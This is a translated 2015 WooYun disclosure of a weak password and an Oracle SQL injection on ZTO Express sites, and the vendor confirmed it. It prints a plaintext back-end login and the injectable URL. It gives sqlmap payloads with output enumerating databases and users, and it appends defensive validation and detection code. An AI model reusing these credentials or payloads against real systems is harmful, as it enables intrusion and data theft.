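Vulnerability summary

Bug ID: wooyun-2015-0151036

Title: Weak back-end password + SQL injection on a ZTO Express (中通快递) site, affecting 22 databases

Vendor: 中通速递 (ZTO Express)

Author: 路人甲

Submitted: 2015-11-01 13:47

Fixed: 2015-12-17 09:32

Published: 2015-12-17 09:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]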


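Vulnerability details

Disclosure status:

2015-11-01: Details reported to the vendor; awaiting vendor handling
2015-11-02: Vendor confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to trainee white hats
2015-12-17: Details disclosed to the public

Brief description:

Weak back-end password + SQL injection

Detailed description:

https://sso.zt-express.com/


Account: zto73619
Password: zto888888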

[Screenshots: 1.png, 2.png, 3.png, 4.png, 5.png]


I will not list them one by one.
SQL injection point:

it.zt-express.com/Views/New/NewView.aspx?id=39937


Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[13:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[13:01:22] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:01:22] [INFO] fetching database (schema) names
available databases [22]:
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB


Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[13:09:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[13:09:53] [INFO] fetching database users
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB
[13:09:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\it.zt-express.com'
[*] shutting down at 13:09:53


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=39937 AND 5460=5460
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (9559=9559) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=39937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(110)||CHR(68)||CHR(110)||CHR(105)||CHR(84)||CHR(66)||CHR(76)||CHR(79)||CHR(75)||CHR(74)||CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
database management system users privileges:


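Proof of vulnerability:

Suggested fix:

Change the password and filter SQL special characters.

Copyright notice: please credit the source when reposting: 路人甲@乌云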
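
An added example, not part of the original report or the vendor's code: allow-list validation of the numeric `id` parameter together with log-review signatures for the four sqlmap techniques listed above. The function names are hypothetical, `strip_special` is one assumed reading of a character filter, the request targets are constructed, and the "error" and "union" values are abbreviated from the report's payloads.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

PATH = "/Views/New/NewView.aspx"  # path of the injectable page in this report

# Values for the id parameter. The benign value and the boolean and time-based
# payloads are quoted from the report; "error" and "union" are abbreviated.
PAYLOADS = {
    "benign": "39937",
    "boolean": "39937 AND 5460=5460",
    "time": "39937 AND 4328=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(86)||CHR(74)||CHR(114),5)",
    "error": "39937 AND 9559=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(62))) FROM DUAL)",
    "union": "39937 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(112),NULL FROM DUAL--",
}

# Constructed request targets, URL-encoded as they would appear in a web log.
REQUESTS = {name: PATH + "?" + urlencode({"id": v}) for name, v in PAYLOADS.items()}

# One signature per technique title in the sqlmap output.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based (XMLType)", re.compile(r"\bXMLType\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
]

# ASCII digits only; str.isdigit() would also accept other Unicode digits.
ID_RE = re.compile(r"[0-9]{1,10}")


def strip_special(value):
    """Hypothetical deny-list filter: drop quotes, semicolons and comment markers."""
    return re.sub(r"['\";]|--|/\*|\*/", "", value)


def parse_record_id(raw):
    """Allow-list validation: return the id as an int, or raise ValueError."""
    if raw is None or not ID_RE.fullmatch(raw):
        raise ValueError("id must be 1 to 10 ASCII digits")
    return int(raw)


def classify(value):
    """Return the names of the signatures that match a decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def review(request_target):
    """Decode one request target; return (accepted_id_or_None, matched_signatures)."""
    values = parse_qs(urlsplit(request_target).query, keep_blank_values=True).get("id", [])
    raw = values[0] if len(values) == 1 else None  # a repeated id parameter is rejected
    try:
        accepted = parse_record_id(raw)
    except ValueError:
        accepted = None
    return accepted, classify(" ".join(values))


if __name__ == "__main__":
    for name, target in REQUESTS.items():
        print(name, review(target))
    # The boolean payload has none of the characters the deny-list removes,
    # so it passes through that filter unchanged.
    print(strip_special(PAYLOADS["boolean"]) == PAYLOADS["boolean"])
```

In the application itself, the validated integer would then be passed to the query as a bind variable instead of being concatenated into the SQL text.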


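Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-11-02 09:30

Vendor reply:

Thank you to the white hat for the hard work; development has already started on the fix.

Latest status:

None yet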